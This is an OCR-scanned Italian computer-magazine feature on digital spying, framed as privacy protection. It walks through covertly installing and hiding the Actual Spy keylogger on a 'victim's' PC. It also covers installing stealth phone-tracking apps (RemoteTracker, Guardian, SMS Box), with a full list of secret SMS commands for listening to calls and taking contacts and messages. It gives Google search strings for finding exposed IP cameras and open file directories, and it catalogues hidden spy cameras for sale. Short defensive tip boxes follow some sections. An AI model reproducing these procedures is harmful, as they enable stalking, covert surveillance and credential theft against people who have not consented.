in poi d basterà raggiun¬ 
gere dal PC il sito Web 
www.avgmobilation. 
comeloggardconidati 
del nostro Google Account 
per vedere su cartina la 
posizione del telefonino. 

È inoltre possibile bloc¬ 
carne l'uso o inviare un 
messaggio d'allarme. 


BACKUP 

COMPLETO 


Fra le funzionalità extra 
offerte da AVG troviamo 
anche un sistema di ba- 
ckup delle applicazioni 
installate sul nostro 
smartphone. Per effet¬ 
tuarlo, basta premere il 
tasto Menu del telefono 
e raggiungere la voce 
Strumenti. Da qui tap 
piamo poi Backup appli¬ 
cazioni e selezioniamo 
quelle che vogliamo sal¬ 
vare. Confermiamo poi, 
premendo il pulsante 
(segui il backup ora. 


ATTENTI ALLE APP 
TRUFFALDINE! 


Sia il market di Android 
che l'App Store sono 
ricchi di applicazioni 
per cellulare. Ma come 
riconoscere se un'app 
è davvero valida o 
nasconde in realtà una 
truffa? In primis leggen¬ 
do le recensioni degli 
utenti (più sono e me¬ 
glio è), poi verificando 
che siano presenti tante 
schermate e infine con¬ 
trollando la periodicità 
degli aggiornamenti 
(meglio evitare se sono 
superiori a sei mesi). 
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C* Ti spio da PC 


| Spia senza farti spiare 


Spia 
farli spiare 




Trasformiamoci in agenti segreti 
per difenderci dai voyeur digitali 
usando le loro stesse tecniche 


NELLE 

PROSSIME 

PAGINE 

BASTA UNA TASTIERA PER 
ESSERE SPIATI.PAG.22 

Con un keylogger, chiunque 
può registrare quello 
che digitiamo sulla tastiera 

ALLA RICERCA 
DELLE CARTELLE 
CONDIVISE.PAG. 23 

Ai pirati basta poco per 
individuare le risorse 
pubbliche sui PC connessi 
a Internet 

TI SPIANO ANCHE SU 
FACEBOOK.PAG. 24 

Uno smanettone può 
facilmente “bucare" il nostro 
profilo e scoprire tutto 
su di noi 

CELLULARE: LA SPIA CHE 
NON TI ASPETTI ....PAG. 26 

In maniera completamente 
"invisibile", c'è chi controlla 
telefonate, SMS e i nostri 
spostamenti 

GOOGLE: IL MIGLIOR AMICO 
DELLE SPIE.PAG. 28 

Grazie ad alcune particolari 
chiavi di ricerca, è possibile 
prendere il controllo delle 
Webcam altrui 


E ntrare di nascosto nella vita privata di 
una persona è più facile di quanto si pos¬ 
sa immaginare. Basta avere gli strumenti 
giusti e sapere come utilizzarli. Una sempli¬ 
ce webcam, ad esempio, può tornare utile 
per sorvegliare casa, ina anche trasformarsi 
nell'occhio indiscreto di chiunque voglia sbir¬ 
ciare nelle abitazioni altrui. Allo stesso modo, 
i software di keylogger nati con lo scopo di 
inori itorare il normale utilizzo del computer, 
permettono anche di registrare tutto quello 
che si d igita sulla tastiera, svelando password, 
dati personali e codici di accesso ai servizi di 
home banking, ma anche e-mail, documenti 
testuali e intere sessioni di chat! 

Ci seguono ovunque 

Anche uno smartphone apparentemente 
innocuo, se ben configurato, diventa un’ot¬ 
tima microspia con cui si possono origliare 
le conversazioni di una persona senza che 
questa si accorga di nulla, oppure seguire 
tutti i suoi spostamenti grazie alle coordi¬ 
nate geografiche calcolate dal modulo GPS 
integrato. Senza dire che il Grande Fratei lo è 
sempre in agguato anche quando visitiamo 
il nostro account Facebook: basta, infatti, 
una semplice applicazione installabile di¬ 
rettamente dal pannello di controllo del so¬ 
cial network per accedere senza più nessun 
controllo a foto e messaggi privati di altri 
utenti. Le tecniche per spiare, quindi, non 
mancano: sono illegali, certo, ma questo 
non ferma eventuali malintenzionati. Ma la 
cosa più preoccupante è che, in realtà, non 
serve essere un agente segreto e disporre 
degli ultimi ritrovati tecnologici! Imparare ad 
utilizzare dispositivi hardware e software “al 
di sopra di ogni sospetto" e di uso quotidiano 
per trasformarci in audaci spioni digitali, ci 
aiuterà a conoscere e affrontare i rischi. Sarà 
più facile, così, non farsi cogliere di sorpresa 
e difendere al meglio la nostra privacy. 













| Spia senza farti spiare 


Ti spio daPCf^ 


IL KIT DEL PERFETTO AGENTE SEGRETO 



MCI 309 MICRO 
TELECAMERA 
CON LENTE A 
BOTTONE 

Le dimensioni 
molto ridotte la ren¬ 
dono facilmente occul¬ 
tabile nei vestiti, anche grazie 
all’obiettivo a forma di bottone. Il 


sensore CMOS da 1,3” con tecnologia CCIQ 
(Challenge CCD Image Quality) garantisce 
una qualità di ripresa simile a quella dei 
sensori CCD. 


■ Quanto costa: € 72,90 

■ Sito Internet: www.rsatel.com 



4GEEK XSECRET EVO VOICE 8 GB 
Fa di tutto per sembrare una normale pen¬ 
na e ci riesce benissimo! Scrive davvero e 
la carica ad inchiostro è pure sostituibile, 
la sua particolarità è la presenza di una 
microcamera nascosta in grado di girare 
video a 1.280x960 pixel e foto ad una 
risoluzione di 1.600x1.200 pixel. 

m Quanto costa: € 49,99 
m Sito Internet: www.youbuy.it 

s___, 


'---—-\ 

USB HARDWARE KEYLOGGER 

Piccolo ed efficace, questo registratore di 
tasti è provvisto di una memoria interna da 
2 GB. Completamente invisibile al sistema 
operativo, non richiede alcun software di 
controllo o driver per funzionare: basta 
collegarci la tastiera e connetterlo ad una 
porta USB del computer. 

« Quanto costa: € 43,99 
* Sito Internet www.keelog.com 




4GEEKXWATCH4GB 
Sembra un normale cro¬ 
nografo, dotato anche 
di elegante cinturino 
in pelle. Se non fos¬ 
se che nasconde 
una microcamera 
con risoluzione video 
da 640x480 pixel a 30 
fps e risoluzione foto da 
1.600x1.200 pixel. È do¬ 
tato di uno slot per schede 
di memoria SD fino a 32 GB. 


■ Quanto costa: € 49,90 

■ Sito Internet: www.youbuy.it 


r 
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4GEEKXTIE4GB 

Non lasciamoci confondere dalle appa¬ 
renze: la “cravatta” na¬ 
sconde una videocamera 
con “microfono in grado di 
registrare video ad alta ri¬ 
soluzione. Per attivarla ba¬ 
sta usare il telecomando 
in dotazione da tenere 
sempre in tasca, per 
ogni evenienza! 


■ Quanto costa: 
€ 59,98 

■ Sito Internet: 

www.youbuy.it 


JVE 3320 MINI 
WIRELESS 
CAMERA 

Anche in un 
normale sen¬ 
sore antifumo 
può nascondersi 
una spia! Dotata di 
memoria interna da 4 GB, permette di 
registrare diverse ore di video. E per non 
effettuare riprese a vuoto, è possibile at¬ 
tivarla all’occorrenza grazie ad un pratico 
telecomando a infrarossi. 

■ Quanto costa: € 64,99 

■ Sito Internet: www.giordanoshop.it 



SPÌE digitali m tre mosse 


Tutti i dispositivi “spia” mostrati 
in questa pagina hanno un fun¬ 
zionamento molto simile: basta 
attivarli (nel caso del keylogger 
occorre ovviamente collegarlo 
alla tastiera e poi al PC) e iniziare 
le registrazioni. In un secondo 
momento sarà possibile scarica¬ 
re i filmati e le foto sull’hard disk 
del computer per rivederli in tut¬ 
ta calma. Nel caso dell’orologio 
da polso, occorre innanzitutto 
accenderlo tenendo premuto 
per 2 secondi il pulsante Swift 
on/Camera keye verificarne la 
carica ( Working indicator tight). 
Per avviare la registrazione video 


basta, quindi, premere di nuovo 
il pulsante Camera key (per le 
foto, premiamo Photo key): la 
spia blu di funzionamento lam- 
peggerà tre volte per poi spe¬ 
gnersi e inizieranno le riprese. 
Per interromperle, premiamo di 
nuovo il pulsante Camera key 
mentre la spia blu lampeggia, 
una breve pressione del pul¬ 
sante servirà per memorizzare 
il video nella memoria dell’oro¬ 
logio. A questo punto, tornati a 
casa, colleghiamo il dispositivo 
al computer mediante il cavo 
USB fornito in dotazione e ri¬ 
guardiamoci le riprese. 



e i video ripresi con 
l’orologio spia 

EJ CAMERA KEY 

Una pressione 
prolungata di 2 
secondi accende 
il dispositivo. Una 
pressione breve avvia 


El PHOTO KEY 

Permette di scattare 
istantanee in JPG 


Q ATTACCO USB 

Usando il cavo USB 
tornito in dotazione 
possiamo scaricare 
sul computer le foto 


la registrazione di un 
video in formato AVI 


a spia 

Indica la modalità di 
funzionamento del 
dispositivo 



www.winmagazine.it/ 

link/850 

Il traitorware è un nuovo 
e insidioso nemico per la 
nostra privacy. Con questo 
termine (dall'inglese 
traitor, traditore, e har¬ 
dware) vengono indicati i 
dispositivi elettronici che 
"rubano" informazioni 
personali ai loro legittimi 
proprietari. Stampanti, 
fotocamere con funzioni 
di geotagging e telefonini 
dotati di modulo GPS sono 
solo alcuni esempi. Ma la 
lista rischia di diventare 
molto più lunga! 
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OH spio da PC 


Ti spio | 


Un kevloqqer può registrare ciò che viene digitato; 

password, e-mail e chat non sono più al sicuro! 


Con una tastiera 

ci possono spiare 


« ■ 1 modo più semplice per spiare le 
I abitudini degli utenti davanti al PC? 
■ Registrare quello che digitano con 
la tastiera! È così possibile scoprire di 
tutto: password di accesso al computer, 
a Facebook e ai vari servizi on-line, e- 
mail, intere sessioni di chat e numeri di 


carta di credito. Per farlo, basta usare u n 
keylogger, un programma-spia nato per 
monitorare gli accessi indesiderati ad 
un PC ma che, nel caso in cui il sistema 
sia incustodito, può trasformarsi in un 
grimaldello per la vita privata dell’uten¬ 
te! I keylogger funzionano in maniera 


"invisibile” (quelli hardware, in realtà, 
sono piccoli dispositivi da collegare tra 
la tastiera e il case del PC, ma nessuno 
ne verifica la presenza prima di avviare 
il sistema...) e in poco tempo riescono a 
violare ogni segreto dell’utente spiato! 
Non ci crediamo? Ecco le prove! 
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Il preferito dagli spioni 

B Sul Win CD-Rom è presente l’archivio Actualspy.zip. Scom¬ 
pattiamolo ed eseguiamo il file actualspy.exe per avviare 
l’installazione di Actual Spy sul PC della "vittima”. Nella prima 
schermata della procedura guidata clicchiamo Next, spuntiamo laccept 
thè agreement e premiamo Next. 


Piacere, sono la spiai 

l Clicchiamo ancora Next per tre volte, poi Instati e, al termine, 
Next e Finish. Avviamo il programma e confermiamo con OK 
nel box visualizzato. Clicchiamo Start monitoring e poi Hide 
per occultare il keylogger. Un box ci ricorda la combinazione segreta 
( Ctrl+Shift+Alt+F8 ) per renderlo nuovamente visibile. 
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Il rapporto finale 

0 Torniamo, in seguito, al PC della vittima, riattiviamo il keylog¬ 
ger e accediamo alle sue registrazioni. Clicchiamo Internet 
Activity. ecco, in Websites visited, le attività che ha svolto su 
Internet! Individuiamo, ad esempio, quelle relative a Facebook e cuc¬ 
chiamoci sopra per visualizzare le sue sessioni di chat! 


PRIVACY: PROTEGGILA COSÌ 

il Installiamo e teniamo sempre aggiornato l’antivirus e 
'^Pl’antispyware. 

^Proteggiamo il nostro accountcon password, creandola 
■3*1 da Start/Pannello di controllo/Account utente. 

Blocchiamo sempre la sessione di Windows premendo i 
®Btasti Win+L quando ci allontaniamo dal PC. 

^ISe usiamo uno Screensaver, proteggiamolo con 
'ttt password: clicchiamo col tasto destro del mouse sul 
desktop e poi su Personalizza/Screen saver. Spuntiamo Al 
ripristino, torna alla schermata di accesso. 
j^Se condividiamo il PC con altri utenti, creiamo per 
ognuno un account “limitato” per impedire l’installazione 
di software. Accediamo a Start/Pannello di controllo/Account 
utente e seguiamo la procedura guidata. 


Tempo 

15 minuti 



Difficoltà 



Cosa ci 
occorre 

Software di 
monitoraggio 
■ La nostra scelta... 

Actual Spy 

Quanto costa: Gratuito 

Sito Internet: www. 
actualkeytogger.com 




ASTERISCHI 
SENZA SEGRETI 

L'aspetto più comune 
con cui siamo abituati 
a vedere una password 
èia suaversione'crip- 
tata", cioè nascosta da 
pallini, asterischi o altri 
simboli che impedisco¬ 
no di dare una sbircia¬ 
tine! Dato che molti 
preferiscono salvare le 
password, ad esempio, 
nel browser, per accede¬ 
re velocemente ai loro 
account Facebook, au¬ 
mentano le probabilità 
di dimenticare i codici. 
Che fare in questi casi? 
Basta usare un software 
che "mette in chiaro" la 
password desiderata. 
Tra i tanti segnaliamo 
RevelationeAsterisk 
Key (presenti nella 
sezione Spaiali del Win 
CD/DVD-Rom). Questi 
programmi, però, sono 
disponibili a tutti e gli 
hacker li possono usare 
per recuperare le nostre 
password. È un classico 
esempio di software a 
doppio taglio, capace di 
servire a scopi nobili e a 
quelli più scorretti. 
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Scopri se ci sono intrusi nella tua rete locale utilizzando 

gli strumenti software preferiti dai pirati informatici 


Alla ricerca delle 
cartelle condivise 


Q uando si condivide una risorsa 
sul proprio computer, sia essa 
una cartella o una stampante, 
bisogna sapere che è molto semplice 
scoprirne da remoto l’esistenza. Ciò 
significa che ad un pirata basta poco 
per individuare i contenuti messi 


a disposizione sul nostro PC. Per 
questo motivo è necessario attivare 
sempre le opportune difese, come 
il firewall e le protezioni in lettura 
e scrittura delle cartelle ed evitare 
il più possibile di attivare directory 
condivise non protette, in modo da 


non lasciare porte aperte ai malin¬ 
tenzionati. Per essere certi di avere 
approntato una corretta linea di di¬ 
fesa, è opportuno imparare ad agire 
come un vero hacker e "attaccare" 
i nostri PC. Vediamo come farlo in 
pochi passi. 



Troviamo ali indirizzi della LAN 

n Per testare la sicurezza della rete usiamo SoftPerfect Network 
Scanner: basta un doppio clic sul file netscan. exe per avviar¬ 
lo (non serve installarlo). Per eseguire una scansione della 
LAN inseriamo in Range From e To gli IP della rete. Se non li cono¬ 
sciamo, cucchiamo Auto Detect IP Range. 
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y Sof^erfec» Network Scanner 



Iniziamo la scansione 

Selezioniamo la scheda di rete installata nel nostro computer, 
clicchiamo OKe poi Start scanning per iniziare lo spionaggio. 
Dopo qualche secondo inizieranno ad apparire le informazio¬ 
ni relative agli altri computer connessi alla LAN. Se vengono trovati 
elementi condivisi, apparirà un’icona a forma di +. 




Le risorse condivise 

Per conoscere le risorse remote e accedere al loro contenuto, 
- clicchiamo sull’icona + e poi, col tasto destro del mouse, su 
una di esse. Dal menu contestuale che appare scegliamo se 
esplorarne il suo contenuto (selezionando Explore ) o accedervi come 
se fosse un disco di rete (Map Network Drive). 


PRIVACY: PROTEGGILA COSÌ 

Teniamo sempre attivo il firewall: avremo cosi la possibilità 
di bloccare ogni accesso non autorizzato al nostro PC. 

Se usiamo il firewall di Windows Vista/7, digitiamo firewall 
nel menu Start e clicchiamo Windows Firewall con protezione 
avanzata. Selezioniamo Regole di protezione delle connessioni e 
poi Nuova regola. Scegliamo di bloccare le connessioni in base 
al dominio (il range di indirizzi IP della nostra LAN, vedi Passo 1) 
o altre regole. 

Creiamo cartelle condivise protette da password. Se 
abbiamo Windows Vista/7, da Start/Pannello di controllo 
clicchiamo Centro connessioni di rete e condivisione. 
Spostiamoci in Condivisione e individuazione e attiviamo la 
Condivisione protetta da password. Solo chi ha un account sul 
computer potrà accedere alle risorse condivise. 





Tempo 

20 minuti 

Difficoltà 


Media 


Cosaci 
occorre 

Sniffer di rete 
■ La nostra scelta... 

SoftPerfect Network 
Scanner 5.1.1 

Quanto costa: Gratuito 

Sito Internet 

www.softpertect.com 




CI SPIANO 
SU INTERNET 


L'analisi effettuata nel 
tutorial si riferisce solo 
ai PC connessi alla LAN 
di casa. Ovviamente, è 
possibile estenderei! 
tentativo di ricerca delle 
cartelle condivise effet¬ 
tuando una scansione 
da "fuori" collegandosi 
cioè a Internet con un al¬ 
tro sistema (ad esempio 
usando un portatile e 
una chiavetta Internet) ' 
per "analizzarci" come 
farebbe un vero hacker. 
La procedura è simile 
a quella del tutorial: 
basterà individuare l'IP 
assegnato al router ADSL 
e dirigere la scansione 
solo verso di lui. Sicura¬ 
mente le porte aperte e 
i computer individuati 
saranno di meno rispet¬ 
to all'analisi effettuata 
nella LAN, visto die il 
router offre un ulteriore 
livello di protezione, ma 
prima di avere la certez¬ 
za (o almeno maggior 
sicurezza) che nessuno 
abbia accesso ai nostri 
dati, è bene svolgere an¬ 
che questa scansione. 
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Cellulare: la spia 
che non li aspetti 

In maniera “invisibile”, c’è chi controlla le telefonate, 
gli SMS e i nostri spostamenti. Ecco in che modo 


Tempo 

o 

30 minuti 


Difficoltà 


Media 



N eppure i telefonini sfuggono più 
alle "attenzioni particolari" degli 
impiccioni telematici. Anche se 
spiare un cellulare rappresenta un’at¬ 
tività illecita, non è difficile trovare su 


Internet dei tool che, una volta installati 
sul dispositivo della vittima, possono re¬ 
cuperare le chiamate effettuate, leggere 
gli SMS inviati/ricev uti e tracciarne gli 
spostamenti grazie al localizzatore GPS. 


E senza che il malcapitato si accorga di 
nulla: tutti i programmi, infatti, sono in 
grado di scomparire dall'elenco delle 
attività in esecuzione, così da compiere 
indisturbati il loro compito. 


1 Controlla il cellulare 


Per spiare i dispositivi Windows Mobile basta installare Remote Tracker. 
Inviando poi un SMS col comando giusto spieremo telefonate e messaggi. 



▲ La soia si installa 

■| I Scompattiamo l’archivio Remotetracker.zip e 
kmmJ trasferiamo il file RemoteTracker.CAB sul tele¬ 
fonino della vittima per installarlo. Per funzionare, il pro¬ 
gramma necessita del .NET Compact Framework 3.5, 
scaricabile da www.microsoft.it. 


Impostazioni iniziali 

Al termine, tappiamo la voce Programmi/Con- 
fig. Selezioniamo Menu/Options/Languages/ 
Italiano. In Password digitiamo la chiave segreta per 
controllare il tool da remoto. Irt Configurazione email 
forniamo l’indirizzo a cui inviare le informazioni. 


7 RemoteTracker nel tuo 
dispositivo? Questa 
operazione non può essere 
annullata. 




Configuration H ,|| QD 


▲ j Ti sorveglio di nascosto 

0 I In Configurazione GPS scegliamo il tipo di GPS. 
In Nascondi RemoteTracker conìemmm con 
Sì per “nascondere” l'applicazione. Il malcapitato, così, 
non si accorgerà di essere spiato. Una volta attivata la 
funzione, non si può più tornare indietro! 


^ No GPS? Non problemi 

A | In CelllD da Coordinate Provider scegliamo 
il provider e tappiamo Applica le Configura¬ 
zioni. Per controllare il cellulare, inviamo un SMS del 
tipo rW[comando]ff[numero di cellulare o indirizzo 
email]#[password], dove la psw è quella del Passo 2 


I COMANDI SEGRETI 
DELLO SPIONE 

HELP - invia la lista dei comandi con un SMS 
CB - fa una chiamata a un numero e lascia il 
telefono acceso (utile per ascoltare una 
conversazione di nascosto) 

GP - avvia il GPS e invia le coordinate 
PB - invia tutti i contatti presenti nella SIM 
GO * per ottenere le informazioni personali 
RST - fa un softreset 

ALARM - fa riprodurre un suono al telefonino 
(utile quando non si sa dove lo si ò lasciato) 

Gl - ottiene l'IMEI e il numero IMSI della SIM 

ELT - serve a ottenere via e-mail il tracciato 

per visualizzarlo su Google Maps 

EHELP - invia la lista dei comandi via e-mail 

EGP - invia le coordinate via e-mail 

EPB - invia i contatti via e-mail 

EGO - per avere informazioni personali via e-mail 

EGI - ottiene IIMEI e numero IMSI della SIM via 

e-mail 

DSC - cancella i contatti della SIM 
GANFL - invia le chiamate fatte e ricevute 
(richiede il programma VITO Audio Notes instal¬ 
lato nel device) 

CELUD - restituisce le informazioni dalla cella 
utilizzata dal telefonino 

CALLHIST - ritorna la fista delle chiamate effet¬ 
tuate. Di default si ricevono le ultime 5 chia¬ 
mate. Ma si può definire un numero diver¬ 
so con il commando rtttcaHhist,[numero delle 
clùamate]tttt[password] 

EGANFL - invia per e-mail le chiamate fatte 
e ricevute (richiede il programma VITO Audio 
Notes installato nel device) 

ECELLID - restituisce le informazioni dalla cella 
utilizzata dal telefonino via e-mail 
ECALLHIST - restituisce le informazioni dalla 
celia utilizzata dal telefonino via e-mail 
ESMS - invia un file zip via e-mail con tutti gli 
SMS compresi numero e testo via e-mail 
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Ti spio 


Ti spio da PCC 


symbian Traditi dal guardiano 

Chi possiede un telefonino Symbian può installare Guardian, un tool sviluppato proprio come antifurto. 
Se opportunamente configurato, può trasformarsi in una infallibilespia tecnologica. 


Edizioni Gold e Platinum 

Inserire il proprio codice di 
registrazione per passare 
all'edizione Gold o Platinum. 

Acquistando l'Edizione Gold e' 
possibile: 


Un guardiano... che spia 

■| § Solo la versione Platinum di Guardian (che 
W 1 ha un costo di € 19,99) può essere sfrut¬ 
tata come'software spia perché è l'unica che 
consente di recuperare gli SMS, le chiamate e 
svela la posizione GPS. Si può installare usando 
l'applicazione Ovi Suite e va attivata inserendo il 
codice fornito all'acquisto. Tutto parte dal menu 
Impostazioni. 



* Addestriamo la spia 

2 1 La configurazione si effettua con una SIM 
diversa da quella dello spiato. Si clicca 
Codice segreto e si digita un codice per acce¬ 
dere a Guardian, usare l' Applicazione Protetta e 
i Comandi di Controllo Remoto. In Destinatario 
si inserisce il numero cui inviare l'SMS di con¬ 
trollo nel caso in cui lo spiato utilizzi una secon¬ 
da scheda SIM. 



È diventata invisibile! 

3 I Si tappa Stato per impostarla su Atti- 
''**** va. Poi chi spia toglie la propria SIM e 
inserisce quella del “sorvegliato”. Tutti gli SMS 
inviati e ricevuti da Guardian saranno invisi¬ 
bili. In particolare, inviando un SMS col testo 
*12345*fonvard*inbox=3( dove 12345è il codi¬ 
ce segreto scelto al Passo 2) Guardian restituisce 
gli ultimi 3 SMS ricevuti dalla vittima allo spione. 


Messaggi per tutti 

SMS Box è un’applicazione per Android che controlla chiamate e messaggi 
scambiati con i googlefonim. Scopriamo come difenderci. 



^ i Passiamo dal Market 

j f Per controllare i messaggi scambiati da un 
~*s=J telefonino Android i pirati usano SMS BOX 
che si scarica dal Market. La prima volta che si 
avvia, provvede in automatico a caricare i messag¬ 
gi e l’elenco delle chiamate su un server. Per usa¬ 
re l'opzione Silent che lo rende invisibile occorre 
acquistare la versione Pro a 19,90 euro. 


a i Serve il codice 

2 I SMS BOX fornisce un codice che va inserito 
sulsitoWebwww.winmagazine.it/link/845. 
Dopo aver effettuato l’accesso, si possono visua¬ 
lizzare l'elenco delle chiamate effettuate, di quel¬ 
le ricevute e anche tutti gli SMS scambiati. Per i 
messaggi, non solo si ha il numero di telefono, ma 
si può leggere perfino il contenuto. 


PRIVACY: 

PROTEGGILA COSI 

Ci spaventa l’idea che qualcuno possa spiare le 
nostre conversazioni? Ecco come correre ai ripari. 


jQ Evitiamo di lasciare incustodito il cellulare 
'*5® sulla scrivania dell’ufficio o sul tavolo del bar: 
bastano pochi secondi, ad un malintenzionato, per- 
installare un software spia. Dopo sarà impossibile 
accorgersi della sua presenza. 

JÉlA meno che non sia strettamente necessario, 
^"disabilitiamo il modulo GPS. Avremo, così, la 
garanzia di poterci muovere liberamente senza che 
nessuno tenga traccia dei nostri spostamenti. 
jQl software spia generano comunque traffico 
’^dati. Eventuali anomalie potrebbero essere un 
utile campanello di allarme che qualcosa di strano 
sta accadendo nel nostro cellulare. 










































Google: il miglior 
amico delle spie 

Grazie a particolari chiavi di ricerca, possiamo prendere 
il controllo delle webcam altrui e scovare file nascosti 


Tempo 

20 minuti 



Difficoltà 

Media 


Cosa ci 
occorre 

Motore di ricerca 

■ La nostra scelta... 

Google 

Quanto costa: Gratuito 

Sito Internet: 

wvwi/.google.it 



S pesso senza neanche accor¬ 
gercene lasciamo in Rete, a 
disposizione di tutti, informa¬ 
zioni personali che possono essere 
facilmente scovate dai "segugi" del 
Web: che si tratti di directory colme 
di file multimediali condivise con 
gli utenti della Rete, di immagini 
catturate dalle webcam o addirit¬ 
tura di file contenenti dati riservati 
(come quelli con le proprie pas¬ 
sword), tutte queste informazioni 
risultano raggiungibili con grande 
facilità. Ciò non dovrebbe stupire: 
molti dispositivi comunemente in 
commercio hanno accesso diretto 


alla Rete e sono dotati di politiche 
di condivisione dei dati trasmessi 
decisamente aperte. Non è poi così 
raro che utenti poco esperti confi¬ 
gurino in modo erroneo applica¬ 
zioni complesse come i Web server, 
utilizzati per la gestione del proprio 
sito personale, con il risultalo di 
lasciare libero accesso ad intere 
directory deH'hard disk. 

Ricerche mirate 

Gli hacker usano uno strumento 
semplice e diretto per individua¬ 
re queste informazioni private e 
questi dati nascosti: il buon vec¬ 


chio Google! Grazie a particolari 
parole chiave chiamate, non a caso, 
Google llacks, è infatti possibile 
"sguinzagliare” il famoso motore di 
ricerca per ottenere una miriade di 

informazioni normalmente nasco¬ 
ste durante la comune navigazione 
sul Web. Grazie ai Google l lacks (sul 

sito www.hackersforcharity.org/ 

ghdb è presente l’elenco completo 
delle chiavi di ricerca, suddiviso 
per argomento) è quindi possibile 
ricercare un gran numero di in¬ 
formazioni diverse, senza essere 
necessariamente abili e smaliziati 
pirati informatici! 


Troviamo le videocamere nascoste 



on il semplice utilizzo di un browser e di Google possiamo individuare mol te webcam e IPCam che trasmettono 
SlWebiS immagini catturate. In alcuni casi è possibile persino spostare la tele camera! 


^ Il lato oscuro di Google 

■i | Le IPCam sono videocamere di sorveglianza 
T n n gi connesse a Internet che, per funzionare, usano 
un Web server interno: alcuni utenti, però, lo lasciano 
“aperto”. Per scovare in Rete queste videocamere col¬ 
leghiamoci all'home page di Google, www.google.it. 


Di che marca sei? 

Per trovare le IPCam e le webcam aperte, è 

_sufficiente scrivere nella barra di ricerca di 

Google alcune particolari stringhe di testo. Per indivi¬ 
duare le videocamere prodotte dalla Axis, ad esempio, 
scriviamo semplicemente intitle:‘‘Live View/ - AXIS' 


▲ Immagini rubate! 

O I Nel browser comparirà un elenco con i risulta- 
- ti della ricerca. A questo punto basta cliccare 
su uno di questi risultati. Apparirà una finestra con le 
immagini della videocamera: alcune volte sarà possi¬ 
bile muoverla usando degli appositi pulsanti. 
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Ti spio da PCf* 


Accesso alle webcam in un clic 


Dal sito Opentopia è possibile controllare le videocamere attive nel mondo, così da non dover 
effettuare lunghe ricerche con Google. Ecco come scovarle servendoci di una pratica mappa. 



^ L'indirizzo giusto 

■J 1 Colleghiamoci a www.opentopia.com: verranno 
'-=***# mostrate le webcam più viste e quelle più recenti pre¬ 
senti sul sito. Clicchiamo Map e in Search fora place indi¬ 
chiamo la città in cui cercare le webcam (ad esempio Sevìlla). 
Da in selezioniamo Spaio e clicchiamo View. 


Un occhio sul mondo 

2 ! Fatto ciò, la mappa verrà aggiornata con la località 
indicata. A destra comparirà una lista delle immagini 
provenienti dalle videocamere più vicine alla località indicata. 
Non ci resta che cliccare su una delle anteprime per visualiz¬ 
zare le riprese in tempo reale! 



TUTTE LE WEBCAM 
CHE VUOI 

Abbiamo visto come 
cercare con le stringhe 
di ricerca di Google 
Hacks le immagini 
provenienti dalle vide¬ 
ocamere Axis. Per sco¬ 
prire quelle che usano 
il software WebcamXP 
la stringa da inserire 
eintitìe:"powered 
by webcamXP" 
intitle :“ProBroadcast”. 
Perle videocamere 
che usano l'applica¬ 
zione Evocam, invece, 
la stringa corretta 
è intitle:"Evo(am~ 
inurl:"webcam.html". 
Infine, per scovare le 
immagini catturate 
con NetSnap usiamo 
intitle:"Live NetSnap 
Cam-Serverfeed". 


BigG trova file nascosti 

Utilizzando il noto motore di ricerca si possono trovare anche file musicali, 
video, eBook e molto altro ancora. Ecco come procedere. 



Google 




U 


Musica e film senza limiti 

In www.google.it scriviamo - inurl:(htm\htr 
| php | asp | aspx \pl\py\ cgi) intitle: “index 01 


+ “iast modified" + “parent directory” +descriptìon 
+size +(mp3 | wmv) “artista". Sostituiamo artista 
con il nome del cantante da cercare. Comparirà un 
elenco dei file trovati. Assicuriamoci che si tratti di 
contenuti sui quali non si applica il diritto d'autore! 


a | Buona lettura a tutti 

2 I Per cercare filmati, nei parametri di ricerca 
w precedenti inseriamo (avi \ mov) al posto di 
(mp3 | wmv). Analogamente, per cercare un eBook 
scriviamo -mrt:(htm\html\php\asp\aspx\pl\py\cg 
i) intitle: ‘ index oT+ * Iast modified+ “parent direc¬ 
tory’’ -hdescription +size +(pdf \ lit \ rtf \ epub) 
“libro ”, sostituendo il titolo dell'eBook a libro 


PIÙ PRIVACY PER Timi 



fccco alcune dritte per impedire ad occhi indiscreti 
di spiare la nostra vita privata. 
jLI Installiamo e configuriamo correttamente 
un firewall per mantenerlo sempre attivo e 
bloccare accessi non autorizzati al nostro PC. Per 
i nostri scopi, possiamo anche utilizzare il firewall 
di Windows. Se abbiamo Windows Vista o 7, digi¬ 
tiamo firewall nel menu Start e clicchiamo su > 
Windows Firewall con protezione avanzata. Nel¬ 
la schermata che appare selezioniamo la voce 
Regole di protezione delle connessioni e poi 
Nuova regola. Quindi scegliamo di bloccare le 
connessioni dall’esterno. 

Quando non utilizziamo la webcam, ricor- 
^5® diamoci sempre di spegnerla. Un eventua¬ 
le spione non avrà così modo di accedervi e usar¬ 
la per i suoi scopi truffaldini. 

Le cartelle condivise devono essere usate 
“ per archiviare temporaneamente file e do¬ 
cumenti. Quando non servono più, ricordiamoci 
di cancellarli. 










































■Password 

■et bucate 


Basta un semplice “programmino” 
per leggere la posta privata degli 
altri e spiarne chat e segreti 


Facebook W9'» 


thè 


peopl.mvo^ U<t - 


C ome ci si collega ad Internet? In Wi- 
Fi! Questa ò la risposta che tutti noi 
abbiamo sulla punta della lingua. Le 
modalità di accesso al Web sono ormai det¬ 
tate dalla "comodità'’; ossia, dalla possibilità 
di navigare in libertà, ovunque ci si trovi, 
senza doversi connettere tisicamente ad un 
router. Sempre più gente, infatti, si affida 
alle tecnologie wireless per condividere fra 
le mura domestiche, in ufficio o nel proprio 
esercizio commerciale, la connettività Web. 

11 Wi-Fi è pratico e veloce: con un clic si è 
in Rete, senza doversi prima cimentare nel 
cablaggio dell’intera casa (soluzione costosa 
e di complessa realizzazione). A dare ulterio¬ 
re sostegno alla diffusione delle tecnologie 
wireless è una notizia di qualche mese fa, 
che ha reso felici gran parte degli internauti 
italiani: il Wi-Fi pubblico è libero! Niente 
più noiose procedure di autenticazione e 
richieste ufficiali per avere eventuali pas¬ 
sword di accesso: da oggi, gli hot spot di-enti 
pubblici ed esercizi commerciali (ma anche 
di privati), possono essere aperti a tutti. Per 
avere un quadro completo sul numero di 
reti aperte presenti sul territorio nazionale, 
possiamo visitare il sito http://wifi.gratis.it 
ed effettuare una ricerca mirata per il nostro 
comune di appartenenza: ci accorgeremo di 
quanti hot spot gratuiti popolino le nostre 
città, senza contare quelli non ancora censiti 
o segnalati. 

Purtroppo, non è tutto rose e fiori: in pro¬ 
porzione aumentano anche i pericoli, dei 
quali non tutti sono al corrente. 1 nostri dati, 
password, numeri di carte di credito ecc. 
viaggiano liberamente nell’etere, diventando 
facile preda di chi ha le competenze tecniche 
per intercettarli. Lo scopo? Spiare ogni movi 
mento sulla grande Rete e, nei casi peggiori, 
privarci del nostro alter ego virtuale. Non a 
